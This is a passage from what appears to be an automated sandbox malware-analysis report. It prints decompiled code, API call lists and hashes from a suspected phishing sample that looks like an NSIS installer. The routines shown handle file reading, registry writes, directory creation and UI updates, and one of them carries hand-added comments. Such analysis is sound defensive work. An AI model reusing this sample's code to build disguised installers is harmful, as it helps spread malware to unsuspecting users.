                                                					} else {
                                                						 *(__ebp - 8) = __ebx;
                                                						 *(__ebp - 0x14) = E00405F92(__ecx, __esi);
                                                						if( *(__ebp - 0x48) > __ebx) {
                                                							do {
                                                								if( *((intOrPtr*)(__ebp - 0x30)) != 0x39) {
                                                									if( *((intOrPtr*)(__ebp - 0x20)) != __ebx ||  *(__ebp - 0xc) != __ebx || E00405CE8( *(__ebp - 0x14), __ebx) >= 0) {
                                                										__eax = __ebp - 0x40;
                                                										if(E00405C8A( *(__ebp - 0x14), __ebp - 0x40, 2) == 0) {
                                                											goto L34;
                                                										} else {
                                                											goto L21;
                                                										}
                                                									} else {
                                                										goto L34;
                                                									}
                                                								} else {
                                                									__eax = __ebp - 0x38;
                                                									_push(__ebx);
                                                									_push(__ebp - 0x38);
                                                									__eax = 2;
                                                									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x20)) = __ebp + 0xa;
                                                									__eax = ReadFile( *(__ebp - 0x14), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x20)), ??, ??); // executed
                                                									if(__eax == 0) {
                                                										goto L34;
                                                									} else {
                                                										__ecx =  *(__ebp - 0x38);
                                                										if(__ecx == __ebx) {
                                                											goto L34;
                                                										} else {
                                                											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                											 *(__ebp - 0x3c) = __ecx;
                                                											 *(__ebp - 0x40) = __eax;
                                                											if( *((intOrPtr*)(__ebp - 0x20)) != __ebx) {
                                                												L28:
                                                												__ax & 0x0000ffff = E00405F79( *(__ebp - 0x10), __ax & 0x0000ffff);
                                                											} else {
                                                												__ebp - 0x40 = __ebp + 0xa;
                                                												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x40, 1) != 0) {
                                                													L21:
                                                													__eax =  *(__ebp - 0x40);
                                                												} else {
                                                													__esi =  *(__ebp - 0x3c);
                                                													__esi =  ~( *(__ebp - 0x3c));
                                                													while(1) {
                                                														_t21 = __ebp - 0x38;
                                                														 *_t21 =  *(__ebp - 0x38) - 1;
                                                														__eax = 0xfffd;
                                                														 *(__ebp - 0x40) = 0xfffd;
                                                														if( *_t21 == 0) {
                                                															goto L22;
                                                														}
                                                														 *(__ebp - 0x3c) =  *(__ebp - 0x3c) - 1;
                                                														__esi = __esi + 1;
                                                														__eax = SetFilePointer( *(__ebp - 0x14), __esi, __ebx, 1); // executed
                                                														__ebp - 0x40 = __ebp + 0xa;
                                                														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x40, 1) == 0) {
                                                															continue;
                                                														} else {
                                                															goto L21;
                                                														}
                                                														goto L22;
                                                													}
                                                												}
                                                												L22:
                                                												if( *((intOrPtr*)(__ebp - 0x20)) != __ebx) {
                                                													goto L28;
                                                												} else {
                                                													if( *(__ebp - 8) == 0xd ||  *(__ebp - 8) == 0xa) {
                                                														if( *(__ebp - 8) == __ax || __ax != 0xd && __ax != 0xa) {
                                                															 *(__ebp - 0x3c) =  ~( *(__ebp - 0x3c));
                                                															__eax = SetFilePointer( *(__ebp - 0x14),  ~( *(__ebp - 0x3c)), __ebx, 1);
                                                														} else {
                                                															__ecx =  *(__ebp - 0x10);
                                                															 *(__ebp - 0xc) =  *(__ebp - 0xc) + 1;
                                                															 *( *(__ebp - 0x10) +  *(__ebp - 0xc) * 2) = __ax;
                                                														}
                                                														goto L34;
                                                													} else {
                                                														__ecx =  *(__ebp - 0x10);
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) + 1;
                                                														 *( *(__ebp - 0x10) +  *(__ebp - 0xc) * 2) = __ax;
                                                														 *(__ebp - 8) = __eax;
                                                														if(__ax == __bx) {
                                                															goto L34;
                                                														} else {
                                                															goto L26;
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L37;
                                                								L26:
                                                								__eax =  *(__ebp - 0xc);
                                                							} while ( *(__ebp - 0xc) <  *(__ebp - 0x48));
                                                						}
                                                						goto L34;
                                                					}
                                                				}
                                                				L37:
                                                				return 0;
                                                			}


                                                APIs
                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                  • Part of subcall function 00405CE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,004025CA,00000000,00000000,?,00000000,00000011), ref: 00405CFE
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: 1d16e4b4e9071ee1365a26ee0af684b72516ff45d02c382df6d476000192f948
                                                • Instruction ID: ba8ec8e77c4dae38fecb7239611b9da649e1c788ef9a4e56db7abbfefa36dde0
                                                • Opcode Fuzzy Hash: 1d16e4b4e9071ee1365a26ee0af684b72516ff45d02c382df6d476000192f948
                                                • Instruction Fuzzy Hash: A1512874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72D0DBB999429B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 984 405191-4051a6 985 4051ac-4051bd 984->985 986 40525d-405261 984->986 987 4051c8-4051d4 lstrlenW 985->987 988 4051bf-4051c3 call 406054 985->988 990 4051f1-4051f5 987->990 991 4051d6-4051e6 lstrlenW 987->991 988->987 993 405204-405208 990->993 994 4051f7-4051fe SetWindowTextW 990->994 991->986 992 4051e8-4051ec lstrcatW 991->992 992->990 995 40520a-40524c SendMessageW * 3 993->995 996 40524e-405250 993->996 994->993 995->996 996->986 997 405252-405255 996->997 997->986
                                                C-Code - Quality: 100%
                                                			E00405191(signed int _a4, WCHAR* _a8) {
                                                				struct HWND__* _v8;
                                                				signed int _v12;
                                                				WCHAR* _v32;
                                                				long _v44;
                                                				int _v48;
                                                				void* _v52;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				WCHAR* _t27;
                                                				signed int _t28;
                                                				long _t29;
                                                				signed int _t37;
                                                				signed int _t38;
                                                
                                                				_t27 =  *0x7a7a24; // 0x103b4
                                                				_v8 = _t27;
                                                				if(_t27 != 0) {
                                                					_t37 =  *0x7a8af4;
                                                					_v12 = _t37;
                                                					_t38 = _t37 & 0x00000001;
                                                					if(_t38 == 0) {
                                                						E00406054(_t38, 0, 0x7a0f20, 0x7a0f20, _a4);
                                                					}
                                                					_t27 = lstrlenW(0x7a0f20);
                                                					_a4 = _t27;
                                                					if(_a8 == 0) {
                                                						L6:
                                                						if((_v12 & 0x00000004) == 0) {
                                                							_t27 = SetWindowTextW( *0x7a7a08, 0x7a0f20); // executed
                                                						}
                                                						if((_v12 & 0x00000002) == 0) {
                                                							_v32 = 0x7a0f20;
                                                							_v52 = 1;
                                                							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                							_v44 = 0;
                                                							_v48 = _t29 - _t38;
                                                							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                						}
                                                						if(_t38 != 0) {
                                                							_t28 = _a4;
                                                							0x7a0f20[_t28] = 0;
                                                							return _t28;
                                                						}
                                                					} else {
                                                						_t27 = lstrlenW(_a8) + _a4;
                                                						if(_t27 < 0x1000) {
                                                							_t27 = lstrcatW(0x7a0f20, _a8);
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t27;
                                                			}

                                                APIs
                                                • lstrlenW.KERNEL32(007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
                                                • lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
                                                • lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
                                                • SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2531174081-0
                                                • Opcode ID: 1195aa0cb1608473c7f4939b13196918cf4c2ab7f0875985e493b2af82bd967e
                                                • Instruction ID: 239aa3d806fe655a10670de66778763bf8aa2df942fa5917c93f0fd796d6fb5a
                                                • Opcode Fuzzy Hash: 1195aa0cb1608473c7f4939b13196918cf4c2ab7f0875985e493b2af82bd967e
                                                • Instruction Fuzzy Hash: 6E21A171900518BACF119FA5DD849CFBFB9EF85354F10806AF904B6291D7794A50CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                (graph image omitted: basic blocks 401d56-401dd7, calling GetDC, GetDeviceCaps, MulDiv, ReleaseDC, CreateFontIndirectW and internal functions 402ba2, 406054; exit path 402531-402532)
                                                C-Code - Quality: 71%
                                                			E00401D56() {
                                                				void* __esi;
                                                				int _t7;
                                                				signed char _t13;
                                                				struct HFONT__* _t16;
                                                				void* _t20;
                                                				struct HDC__* _t26;
                                                				void* _t28;
                                                				void* _t30;
                                                
                                                				_t26 = GetDC( *(_t30 - 0xc));
                                                				_t7 = GetDeviceCaps(_t26, 0x5a);
                                                				0x40cdd0->lfHeight =  ~(MulDiv(E00402BA2(2), _t7, 0x48));
                                                				ReleaseDC( *(_t30 - 0xc), _t26);
                                                				 *0x40cde0 = E00402BA2(3);
                                                				_t13 =  *((intOrPtr*)(_t30 - 0x1c));
                                                				 *0x40cde7 = 1;
                                                				 *0x40cde4 = _t13 & 0x00000001;
                                                				 *0x40cde5 = _t13 & 0x00000002;
                                                				 *0x40cde6 = _t13 & 0x00000004;
                                                				E00406054(_t20, _t26, _t28, "Tahoma",  *((intOrPtr*)(_t30 - 0x28)));
                                                				_t16 = CreateFontIndirectW(0x40cdd0); // executed
                                                				_push(_t16);
                                                				_push(_t28);
                                                				E00405F79();
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t30 - 4));
                                                				return 0;
                                                			}

                                                APIs
                                                • GetDC.USER32(?), ref: 00401D59
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                • ReleaseDC.USER32 ref: 00401D86
                                                • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401DD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID: Tahoma
                                                • API String ID: 3808545654-3580928618
                                                • Opcode ID: 500d07c7ab604488b997273f6a95938f3c1fb7337d52538531d648fcc8621206
                                                • Instruction ID: 622cf3373c7b4650c41a942921d5e593d98aece64efbd6d354285906af2a4305
                                                • Opcode Fuzzy Hash: 500d07c7ab604488b997273f6a95938f3c1fb7337d52538531d648fcc8621206
                                                • Instruction Fuzzy Hash: 09014F31944640EFE701ABB0AF4ABDA3F74AB66305F104579E641B61E2DA7800059B2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                (graph image omitted: basic blocks 403027-40321c, calling GetTickCount, MulDiv, wsprintfW and internal functions 403235, 40321f, 405cb9, 406527, 405191)
                                                C-Code - Quality: 95%
                                                			E00403027(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                				signed int _v8;
                                                				int _v12;
                                                				intOrPtr _v16;
                                                				long _v20;
                                                				intOrPtr _v24;
                                                				short _v152;
                                                				void* _t65;
                                                				long _t70;
                                                				intOrPtr _t74;
                                                				long _t75;
                                                				intOrPtr _t76;
                                                				void* _t77;
                                                				int _t87;
                                                				intOrPtr _t91;
                                                				intOrPtr _t94;
                                                				long _t95;
                                                				signed int _t96;
                                                				int _t97;
                                                				int _t98;
                                                				intOrPtr _t99;
                                                				void* _t100;
                                                				void* _t101;
                                                
                                                				_t96 = _a16;
                                                				_t91 = _a12;
                                                				_v12 = _t96;
                                                				if(_t91 == 0) {
                                                					_v12 = 0x8000;
                                                				}
                                                				_v8 = _v8 & 0x00000000;
                                                				_v16 = _t91;
                                                				if(_t91 == 0) {
                                                					_v16 = 0x78f6f8;
                                                				}
                                                				_t62 = _a4;
                                                				if(_a4 >= 0) {
                                                					E00403235( *0x7a8a98 + _t62);
                                                				}
                                                				if(E0040321F( &_a16, 4) == 0) {
                                                					L41:
                                                					_push(0xfffffffd);
                                                					goto L42;
                                                				} else {
                                                					if((_a19 & 0x00000080) == 0) {
                                                						if(_t91 != 0) {
                                                							if(_a16 < _t96) {
                                                								_t96 = _a16;
                                                							}
                                                							if(E0040321F(_t91, _t96) != 0) {
                                                								_v8 = _t96;
                                                								L44:
                                                								return _v8;
                                                							} else {
                                                								goto L41;
                                                							}
                                                						}
                                                						if(_a16 <= _t91) {
                                                							goto L44;
                                                						}
                                                						_t87 = _v12;
                                                						while(1) {
                                                							_t97 = _a16;
                                                							if(_a16 >= _t87) {
                                                								_t97 = _t87;
                                                							}
                                                							if(E0040321F(0x78b6f8, _t97) == 0) {
                                                								goto L41;
                                                							}
                                                							if(E00405CB9(_a8, 0x78b6f8, _t97) == 0) {
                                                								L28:
                                                								_push(0xfffffffe);
                                                								L42:
                                                								_pop(_t65);
                                                								return _t65;
                                                							}
                                                							_v8 = _v8 + _t97;
                                                							_a16 = _a16 - _t97;
                                                							if(_a16 > 0) {
                                                								continue;
                                                							}
                                                							goto L44;
                                                						}
                                                						goto L41;
                                                					}
                                                					_t70 = GetTickCount();
                                                					 *0x40ce58 =  *0x40ce58 & 0x00000000;
                                                					_t14 =  &_a16;
                                                					 *_t14 = _a16 & 0x7fffffff;
                                                					_v20 = _t70;
                                                					 *0x40ce40 = 0xb;
                                                					_a4 = _a16;
                                                					if( *_t14 <= 0) {
                                                						goto L44;
                                                					} else {
                                                						goto L9;
                                                					}
                                                					while(1) {
                                                						L9:
                                                						_t98 = 0x4000;
                                                						if(_a16 < 0x4000) {
                                                							_t98 = _a16;
                                                						}
                                                						if(E0040321F(0x78b6f8, _t98) == 0) {
                                                							goto L41;
                                                						}
                                                						_a16 = _a16 - _t98;
                                                						 *0x40ce30 = 0x78b6f8;
                                                						 *0x40ce34 = _t98;
                                                						while(1) {
                                                							_t94 = _v16;
                                                							 *0x40ce38 = _t94;
                                                							 *0x40ce3c = _v12;
                                                							_t74 = E00406527(0x40ce30);
                                                							_v24 = _t74;
                                                							if(_t74 < 0) {
                                                								break;
                                                							}
                                                							_t99 =  *0x40ce38; // 0x7924f8
                                                							_t100 = _t99 - _t94;
                                                							_t75 = GetTickCount();
                                                							_t95 = _t75;
                                                							if(( *0x7a8af4 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
                                                								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                								_t101 = _t101 + 0xc;
                                                								E00405191(0,  &_v152);
                                                								_v20 = _t95;
                                                							}
                                                							if(_t100 == 0) {
                                                								if(_a16 > 0) {
                                                									goto L9;
                                                								}
                                                								goto L44;
                                                							} else {
                                                								if(_a12 != 0) {
                                                									_t76 =  *0x40ce38; // 0x7924f8
                                                									_v8 = _v8 + _t100;
                                                									_v12 = _v12 - _t100;
                                                									_v16 = _t76;
                                                									L23:
                                                									if(_v24 != 4) {
                                                										continue;
                                                									}
                                                									goto L44;
                                                								}
                                                								_t77 = E00405CB9(_a8, _v16, _t100); // executed
                                                								if(_t77 == 0) {
                                                									goto L28;
                                                								}
                                                								_v8 = _v8 + _t100;
                                                								goto L23;
                                                							}
                                                						}
                                                						_push(0xfffffffc);
                                                						goto L42;
                                                					}
                                                					goto L41;
                                                				}
                                                			}
                                                0x004030b1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004030b7
                                                0x004030b7
                                                0x004030b7
                                                0x004030bf
                                                0x004030c1
                                                0x004030c1
                                                0x004030d2
                                                0x00000000
                                                0x00000000
                                                0x004030d8
                                                0x004030db
                                                0x004030e1
                                                0x004030e7
                                                0x004030e7
                                                0x004030f2
                                                0x004030f8
                                                0x004030fd
                                                0x00403104
                                                0x00403107
                                                0x00000000
                                                0x00000000
                                                0x0040310d
                                                0x00403113
                                                0x00403115
                                                0x0040311e
                                                0x00403120
                                                0x00403151
                                                0x00403157
                                                0x00403163
                                                0x00403168
                                                0x00403168
                                                0x0040316d
                                                0x004031a8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040316f
                                                0x00403173
                                                0x0040318a
                                                0x0040318f
                                                0x00403192
                                                0x00403195
                                                0x00403198
                                                0x0040319c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004031a2
                                                0x0040317c
                                                0x00403183
                                                0x00000000
                                                0x00000000
                                                0x00403185
                                                0x00000000
                                                0x00403185
                                                0x0040316d
                                                0x004031b0
                                                0x00000000
                                                0x004031b0
                                                0x00000000
                                                0x004030b7

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 551687249-2449383134
                                                • Opcode ID: f3ce815b3ce23d87c6a937b6e6d87f9e0afd4b1277b2b64b34a5536ec2ef900c
                                                • Instruction ID: c5c4fbc020d382a06f3b5c516385cf2f0b989405556926c34d029951a3a1b574
                                                • Opcode Fuzzy Hash: f3ce815b3ce23d87c6a937b6e6d87f9e0afd4b1277b2b64b34a5536ec2ef900c
                                                • Instruction Fuzzy Hash: EC519B31801209EBCB10CFA5DA44B9F7BB8AF55726F1441BBE914B72C1C7789E008BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 1070 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 1077 4023c7-4023cf 1070->1077 1078 402a4c-402a5b 1070->1078 1079 4023d1-4023de call 402bbf lstrlenW 1077->1079 1080 4023e2-4023e5 1077->1080 1079->1080 1083 4023f5-4023f8 1080->1083 1084 4023e7-4023f4 call 402ba2 1080->1084 1088 402409-40241d RegSetValueExW 1083->1088 1089 4023fa-402404 call 403027 1083->1089 1084->1083 1092 402422-4024fc RegCloseKey 1088->1092 1093 40241f 1088->1093 1089->1088 1092->1078 1095 40281e-402825 1092->1095 1093->1092 1095->1078
                                                C-Code - Quality: 85%
			E0040237B(void* __eax) {
				void* _t17;
				short* _t20;
				int _t21;
				long _t24;
				char _t26;
				int _t28;        /* added: used at 004023D9 but left undeclared by the decompiler */
				int _t29;
				intOrPtr _t37;
				void* _t39;      /* frame pointer: the caller's locals are read through it */

				/* Writes one registry value. _t37 selects how the data at 0x40b5c8 is produced:
				   1 = wide string (byte size from lstrlenW), 4 = 32-bit integer, 3 = raw data filled in by E00403027. */
				_t29 = 0;                               /* assumption: zeroed register passed for every reserved/optional argument below */
				_t17 = E00402CB4(__eax);                /* root key handle */
				_t37 =  *((intOrPtr*)(_t39 - 0x1c));    /* value kind selector (1, 3 or 4) */
				 *(_t39 - 0x34) =  *(_t39 - 0x18);      /* REG_* data type handed to RegSetValueExW */
				 *(_t39 - 8) = E00402BBF(2);            /* value name */
				_t20 = E00402BBF(0x11);                 /* subkey path */
				 *(_t39 - 4) = 1;                       /* failure marker, cleared only when RegSetValueExW succeeds */
				/* 0x2 = KEY_SET_VALUE; the global at 0x7a8af0 is OR'ed in and, from its use in E00402BFF, appears to hold a KEY_WOW64_* view flag */
				_t21 = RegCreateKeyExW(_t17, _t20, _t29, _t29, _t29,  *0x7a8af0 | 0x00000002, _t29, _t39 + 8, _t29); // executed
				if(_t21 == 0) {
					if(_t37 == 1) {
						E00402BBF(0x23);                                    /* string data is placed in the buffer at 0x40b5c8 */
						_t21 = lstrlenW(0x40b5c8) + _t28 + 2;               /* byte size of the wide string; _t28 is a register the decompiler did not name */
					}
					if(_t37 == 4) {
						_t26 = E00402BA2(3);
						 *0x40b5c8 = _t26;                                  /* integer value stored in the buffer */
						_t21 = _t37;                                        /* size 4 */
					}
					if(_t37 == 3) {
						_t21 = E00403027( *((intOrPtr*)(_t39 - 0x20)), _t29, 0x40b5c8, 0x1800); // executed, returns the data size
					}
					_t24 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 8), _t29,  *(_t39 - 0x34), 0x40b5c8, _t21); // executed
					if(_t24 == 0) {
						 *(_t39 - 4) = _t29;                                /* success: nothing added to the error counter */
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);                     /* global counter of failed operations */
				return 0;
			}


                                                APIs
                                                • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CloseCreateValuelstrlen
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp
                                                • API String ID: 1356686001-1732896309
                                                • Opcode ID: c8d2024ca6914caa20ff415175f9df726a7bf297326ec571d110e4b150377c25
                                                • Instruction ID: eb15040666a4b84098e37ffbf96cc219ad532b268eb93921d51e5d7316b4335f
                                                • Opcode Fuzzy Hash: c8d2024ca6914caa20ff415175f9df726a7bf297326ec571d110e4b150377c25
                                                • Instruction Fuzzy Hash: 9B119D71A00108BEEB11AFA4DE89DAE76BDEB44358F11403AF904B21D1DAB89E409668
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 1096 405660-4056ab CreateDirectoryW 1097 4056b1-4056be GetLastError 1096->1097 1098 4056ad-4056af 1096->1098 1099 4056d8-4056da 1097->1099 1100 4056c0-4056d4 SetFileSecurityW 1097->1100 1098->1099 1100->1098 1101 4056d6 GetLastError 1100->1101 1101->1099
                                                C-Code - Quality: 100%
			E00405660(WCHAR* _a4) {
